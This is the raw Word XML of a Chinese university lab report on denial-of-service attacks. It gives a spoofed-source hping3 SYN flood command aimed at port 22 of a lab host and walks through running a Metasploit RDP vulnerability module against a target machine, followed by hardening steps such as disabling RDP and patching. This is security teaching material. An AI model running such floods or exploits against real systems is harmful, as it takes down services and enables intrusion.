                <w:caps w:val="0"/>
                <w:color w:val="17233F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17233F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>TCP的拒绝服务攻击实现相对容易，可以针对linux的22号端口实施。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="251D1DD7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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17233F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>利用hping3构造一次基于TCP的拒绝服务攻击。在Kali终端中输入如下命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60BD90F4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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7F7F7"/>
              </w:rPr>
              <w:t>hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="000000"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:fill="F7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11962380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在linux系统上可以使用top命令查看CPU、内存使用情况，可以观察攻击前后的变化。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0896976B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5270500" cy="3026410"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                  <wp:docPr id="1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3026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E3DF8C">
            <w:p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3、应用层的拒绝服务攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC97E36">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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启动msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138C1CBE">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5260340" cy="2811780"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="762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340" cy="2811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A0E12D">
            <w:pPr>
              <w:spacing w:line="36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找寻对应的漏洞库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ADB8CED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5269230" cy="5241925"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="63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524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E0AFC5">
            <w:pPr>
              <w:spacing w:line="36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选用第一个侦察</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B882101">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5273040" cy="874395"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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874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902B72">
            <w:pPr>
              <w:spacing w:line="36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查看所需参数，主机ip、3389端口和单线程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C71B9A9">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5269230" cy="4483100"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="1270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448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7FF124">
            <w:pPr>
              <w:spacing w:line="36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设置目标ip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18BA3F3F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5267960" cy="3524885"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="1079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3524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072BF5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5273675" cy="979805"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="1079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979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472782">
            <w:pPr>
              <w:spacing w:line="36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检查一下目标端口</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="296EDC14">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5268595" cy="3558540"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="7620"/>
                  <wp:docPr id="1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3558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336CE0">
            <w:pPr>
              <w:spacing w:line="36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3389未开启，启动一下远程桌面</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F5BA76F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4168140" cy="4815840"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:docPr id="1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8140" cy="481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711A66">
            <w:pPr>
              <w:spacing w:line="36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再次检查端口，3389已开启</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B45E292">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5273040" cy="3528060"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="13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3528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6996CD">
            <w:pPr>
              <w:spacing w:line="36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执行漏洞扫描</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37967CF7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5266690" cy="1783080"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="14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1783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A8509C">
            <w:pPr>
              <w:spacing w:line="36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目标条件符合</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3061DC22">
            <w:pPr>
              <w:spacing w:line="36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选择漏洞，查看所需参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36CDCF8B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5265420" cy="4681855"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="12065"/>
                  <wp:docPr id="15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468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21DABB">
            <w:pPr>
              <w:spacing w:line="36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设置目标ip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED4969E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5273040" cy="1137920"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="16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1137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5C2741">
            <w:pPr>
              <w:spacing w:line="36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执行漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED20CC6">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5268595" cy="3054985"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
                  <wp:docPr id="22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3054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66DB46">
            <w:pPr>
              <w:spacing w:line="36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检查目标靶机</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761D9282">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5269230" cy="3695065"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
                  <wp:docPr id="23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3695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2BB0CA">
            <w:pPr>
              <w:spacing w:line="36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成功执行漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="142CE5B8">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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4、漏洞加固</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552EDA93">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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）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对服务进行加固，关闭windows系统中的远程桌面协议（Remote Desktop Services、Terminal Services、Remote Assistance服务）实现加固。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62FA5E08">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4198620" cy="4800600"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:docPr id="24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8620" cy="480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A61A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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69230" cy="1382395"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
                  <wp:docPr id="25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1382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BB8A02">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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）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安装对应系统漏洞补丁。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28CE4EF9">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5266055" cy="2560320"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                  <wp:docPr id="26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055" cy="2560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2AD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 w14:paraId="62A0663E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实验总结与反思</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52C04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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
          </w:tcPr>
          <w:p w14:paraId="4054D4F9">
            <w:pPr>
              <w:keepLines/>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过本次拒绝服务攻击实验，我掌握了使用`hping3`和`msfconsole`实施ICMP、UDP、TCP Flood攻击以及应用层攻击的操作方法，深刻理解了这些攻击对目标系统的影响。在实践过程中，我观察到高频率的请求会消耗目标主机的资源，导致服务性能下降甚至宕机。此外，我还学习了如何通过关闭不必要的服务、安装系统补丁和配置防火墙等措施来防护拒绝服务攻击。实验让我进一步认识到防护措施的重要性，以及根据系统环境进行针对性防护的必要性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="73A1D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 w14:paraId="76FEB3EE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 w14:paraId="10C99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8" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E781143">
            <w:pPr>
              <w:keepLines/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="02816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8"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CB6C853">
            <w:pPr>
              <w:keepLines/>
              <w:wordWrap w:val="0"/>
              <w:jc w:val="right"/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61A47686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006B1307"/>
    <w:rsid w:val="00005BAC"/>
    <w:rsid w:val="00013A2B"/>
    <w:rsid w:val="00060F34"/>
    <w:rsid w:val="00063F51"/>
    <w:rsid w:val="000709B5"/>
    <w:rsid w:val="00075937"/>
    <w:rsid w:val="0009571E"/>
    <w:rsid w:val="000A3E08"/>
    <w:rsid w:val="000A43AD"/>
    <w:rsid w:val="000A53BA"/>
    <w:rsid w:val="000A5732"/>
    <w:rsid w:val="000B78CF"/>
    <w:rsid w:val="000C3B8E"/>
    <w:rsid w:val="000F4DDC"/>
    <w:rsid w:val="00112450"/>
    <w:rsid w:val="00134AC8"/>
    <w:rsid w:val="00154E4C"/>
    <w:rsid w:val="001621F2"/>
    <w:rsid w:val="001A0F1B"/>
    <w:rsid w:val="001C67F6"/>
    <w:rsid w:val="001F3990"/>
    <w:rsid w:val="0021149B"/>
    <w:rsid w:val="00220939"/>
    <w:rsid w:val="00250150"/>
    <w:rsid w:val="002572E6"/>
    <w:rsid w:val="00267780"/>
    <w:rsid w:val="00315E92"/>
    <w:rsid w:val="00315FAB"/>
    <w:rsid w:val="003324AF"/>
    <w:rsid w:val="00337B96"/>
    <w:rsid w:val="00343C18"/>
    <w:rsid w:val="00353F42"/>
    <w:rsid w:val="00384A66"/>
    <w:rsid w:val="00421D79"/>
    <w:rsid w:val="0043314B"/>
    <w:rsid w:val="0045241A"/>
    <w:rsid w:val="00454A15"/>
    <w:rsid w:val="00473B2E"/>
    <w:rsid w:val="00487AB8"/>
    <w:rsid w:val="004C553A"/>
    <w:rsid w:val="004E38F8"/>
    <w:rsid w:val="005972D6"/>
    <w:rsid w:val="005A2155"/>
    <w:rsid w:val="005E6D0D"/>
    <w:rsid w:val="005F6D02"/>
    <w:rsid w:val="00613211"/>
    <w:rsid w:val="0061684E"/>
    <w:rsid w:val="0063520D"/>
    <w:rsid w:val="00654B96"/>
    <w:rsid w:val="006667DC"/>
    <w:rsid w:val="006923A8"/>
    <w:rsid w:val="006B1307"/>
    <w:rsid w:val="006B211D"/>
    <w:rsid w:val="006C4544"/>
    <w:rsid w:val="006D0376"/>
    <w:rsid w:val="00746E3F"/>
    <w:rsid w:val="00755ED5"/>
    <w:rsid w:val="00770911"/>
    <w:rsid w:val="00786E25"/>
    <w:rsid w:val="00795767"/>
    <w:rsid w:val="007D5A3C"/>
    <w:rsid w:val="008036DC"/>
    <w:rsid w:val="00842982"/>
    <w:rsid w:val="00851476"/>
    <w:rsid w:val="00896D2A"/>
    <w:rsid w:val="008D52E0"/>
    <w:rsid w:val="008D5A8A"/>
    <w:rsid w:val="008E60CD"/>
    <w:rsid w:val="008E62F7"/>
    <w:rsid w:val="008F4B53"/>
    <w:rsid w:val="009A13A1"/>
    <w:rsid w:val="009A36E5"/>
    <w:rsid w:val="009B4A3E"/>
    <w:rsid w:val="009D7928"/>
    <w:rsid w:val="00A56A17"/>
    <w:rsid w:val="00A65FD2"/>
    <w:rsid w:val="00A83899"/>
    <w:rsid w:val="00A95D40"/>
    <w:rsid w:val="00AA3B86"/>
    <w:rsid w:val="00AF363F"/>
    <w:rsid w:val="00B0162C"/>
    <w:rsid w:val="00B1017C"/>
    <w:rsid w:val="00BC0393"/>
    <w:rsid w:val="00BE4B16"/>
    <w:rsid w:val="00C12131"/>
    <w:rsid w:val="00C14ACC"/>
    <w:rsid w:val="00C74821"/>
    <w:rsid w:val="00C8400E"/>
    <w:rsid w:val="00D53FAC"/>
    <w:rsid w:val="00D60BBD"/>
    <w:rsid w:val="00D742DC"/>
    <w:rsid w:val="00D82A0C"/>
    <w:rsid w:val="00D917BB"/>
    <w:rsid w:val="00DE274D"/>
    <w:rsid w:val="00DE6FEE"/>
    <w:rsid w:val="00DF54B6"/>
    <w:rsid w:val="00E76716"/>
    <w:rsid w:val="00EA2E68"/>
    <w:rsid w:val="00EB4B7E"/>
    <w:rsid w:val="00EC058D"/>
    <w:rsid w:val="00F01C21"/>
    <w:rsid w:val="00F553D0"/>
    <w:rsid w:val="00F677AC"/>
    <w:rsid w:val="028A4D16"/>
    <w:rsid w:val="079A50EF"/>
    <w:rsid w:val="159018F8"/>
    <w:rsid w:val="17CF3DBC"/>
    <w:rsid w:val="1E0A52B3"/>
    <w:rsid w:val="1EFA01E5"/>
    <w:rsid w:val="2D800A7D"/>
    <w:rsid w:val="322438DF"/>
    <w:rsid w:val="33A36274"/>
    <w:rsid w:val="342F59EC"/>
    <w:rsid w:val="34C15FC4"/>
    <w:rsid w:val="375F39C6"/>
    <w:rsid w:val="5A870729"/>
    <w:rsid w:val="5D527DE9"/>
    <w:rsid w:val="647B1880"/>
    <w:rsid w:val="649C6849"/>
    <w:rsid w:val="65071F0A"/>
    <w:rsid w:val="688D42B6"/>
    <w:rsid w:val="698940AD"/>
    <w:rsid w:val="6AFE43AE"/>
    <w:rsid w:val="6CF36A4E"/>
    <w:rsid w:val="730A3269"/>
    <w:rsid w:val="7B5543F3"/>
    <w:rsid w:val="7B7E7483"/>
    <w:rsid w:val="7DCC35B5"/>
    <w:rsid w:val="7F2A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qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden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11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7"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="19"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5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8"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="9">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="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0">
    <w:name w:val="Table Simple 3"/>
    <w:basedOn w:val="8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12">
    <w:name w:val="page number"/>
    <w:basedOn w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="Hyperlink"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="14">
    <w:name w:val="annotation reference"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15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6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7">
    <w:name w:val="批注文字 字符"/>
    <w:link w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="批注主题 字符"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="批注框文本 字符"/>
    <w:link w:val="4"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="屏幕2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="260" w:lineRule="atLeast"/>
      <w:ind w:left="851"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:kern w:val="0"/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1074</Words>
  <Characters>1696</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2045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2020-04-22T12:11:00Z</dcterms:created>
  <dc:creator>SDWM</dc:creator>
  <cp:lastModifiedBy>`</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-11T13:35:44Z</dcterms:modified>
  <dc:title>福建工程学院信息科学与工程学院</dc:title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BFA1A88991DD4197A455DFFFB10FAF87_13</vt:lpwstr>
  </property>
</Properties>
</file>